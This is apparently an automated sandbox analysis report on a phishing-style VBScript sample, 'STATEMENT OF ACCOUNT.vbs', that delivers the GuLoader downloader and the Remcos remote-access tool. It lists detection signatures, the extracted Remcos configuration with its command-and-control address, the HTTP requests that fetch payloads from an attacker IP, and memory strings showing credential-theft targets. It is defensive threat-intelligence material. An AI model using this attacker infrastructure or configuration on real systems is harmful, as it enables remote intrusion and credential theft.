Windows Analysis Report
STATEMENT OF ACCOUNT.vbs

Overview

General Information

Sample name: STATEMENT OF ACCOUNT.vbs
Analysis ID: 1465957
MD5: 229da25a75bd9df3b4bd92268ed0d2fe
SHA1: fe45ca4366c5f7a5bc6df83bc66e18b691041f4f
SHA256: ec41d23e297c8f8aa407ef610a8f3082a1e103addf113cfe3e4d2ec6733b54e8
Tags: vbs
Infos:

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Obfuscated command line found
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Remcos, RemcosRAT Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

AV Detection

barindex
Source: 00000009.00000002.2993796074.0000000006623000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": "103.237.87.159:9462:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-LO8JHK", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: Yara match File source: 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2993796074.0000000006623000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2991104356.0000000002F0F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 7772, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbT source: powershell.exe, 00000004.00000002.2235317847.0000000007B60000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: tem.Core.pdb4 source: powershell.exe, 00000004.00000002.2235317847.0000000007B60000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_227910F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 9_2_227910F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_0040AE51 FindFirstFileW,FindNextFileW, 10_2_0040AE51
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 11_2_00407EF8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 12_2_00407898

Software Vulnerabilities

barindex
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

barindex
Source: Malware configuration extractor URLs: 103.237.87.159
Source: global traffic TCP traffic: 192.168.2.4:49739 -> 103.237.87.159:9462
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: Joe Sandbox View IP Address: 178.237.33.50 178.237.33.50
Source: Joe Sandbox View IP Address: 103.237.86.247 103.237.86.247
Source: Joe Sandbox View ASN Name: BGNR-AP2BainandCompanySG BGNR-AP2BainandCompanySG
Source: global traffic HTTP traffic detected: GET /Udmagret.hhk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.237.86.247Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /NtqoCaH77.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.237.86.247Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: global traffic HTTP traffic detected: GET /Udmagret.hhk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.237.86.247Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /NtqoCaH77.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.237.86.247Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: wab.exe, 00000009.00000002.3005282213.00000000220F0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000C.00000002.2306940692.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2367729932.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: wab.exe, wab.exe, 0000000C.00000002.2306940692.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2367729932.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: wab.exe String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: wab.exe, 0000000D.00000003.2369245818.0000000004CCE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2369402203.0000000004CCE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2369461857.0000000004CCE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login G equals www.facebook.com (Facebook)
Source: wab.exe, 0000000D.00000003.2369245818.0000000004CCE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2369402203.0000000004CCE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2369461857.0000000004CCE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login G equals www.yahoo.com (Yahoo)
Source: wab.exe, 0000000A.00000003.2329290801.0000000004ECE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2329963298.0000000004ECE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2330023743.0000000004ECE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login*t equals www.facebook.com (Facebook)
Source: wab.exe, 0000000A.00000003.2329290801.0000000004ECE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2329963298.0000000004ECE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2330023743.0000000004ECE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login*t equals www.yahoo.com (Yahoo)
Source: wab.exe, 0000000D.00000003.2370974438.0000000004CCC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2371322290.0000000004CCC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2370073946.0000000004CC1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login2_ equals www.facebook.com (Facebook)
Source: wab.exe, 0000000D.00000003.2370974438.0000000004CCC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2371322290.0000000004CCC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2370073946.0000000004CC1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login2_ equals www.yahoo.com (Yahoo)
Source: wab.exe, 0000000A.00000003.2347870319.0000000004EC0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2347553603.0000000004EC0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2348008932.0000000004EC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login8l equals www.facebook.com (Facebook)
Source: wab.exe, 0000000A.00000003.2347870319.0000000004EC0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2347553603.0000000004EC0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2348008932.0000000004EC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login8l equals www.yahoo.com (Yahoo)
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: pop-lva1.www.linkedin.com equals www.linkedin.com (Linkedin)
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: pop-lva1.www.linkedin.com0 equals www.linkedin.com (Linkedin)
Source: wab.exe, 00000009.00000002.3005639925.0000000022660000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.2371702960.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: wab.exe, 00000009.00000002.3005639925.0000000022660000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.2371702960.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: geoplugin.net
Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.2
Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.23
Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237
Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.
Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.8
Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86
Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.
Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.2
Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.24
Source: powershell.exe, 00000001.00000002.2293994256.0000026CD808F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2293994256.0000026CD6A44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247
Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/
Source: wab.exe, 00000009.00000002.2993796074.00000000065E8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3004785425.00000000217A0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2993796074.0000000006623000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/NtqoCaH77.bin
Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/U
Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Ud
Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Udm
Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Udma
Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Udmag
Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Udmagr
Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Udmagre
Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Udmagret
Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Udmagret.
Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Udmagret.h
Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Udmagret.hh
Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2293994256.0000026CD67F9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Udmagret.hhk
Source: powershell.exe, 00000004.00000002.2227965271.00000000043CA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Udmagret.hhkXR
Source: powershell.exe, 00000001.00000002.2293994256.0000026CD808F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237H
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
Source: bhv5123.tmp.13.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: bhv5123.tmp.13.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
Source: powershell.exe, 00000004.00000002.2232934862.0000000006C5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro?
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
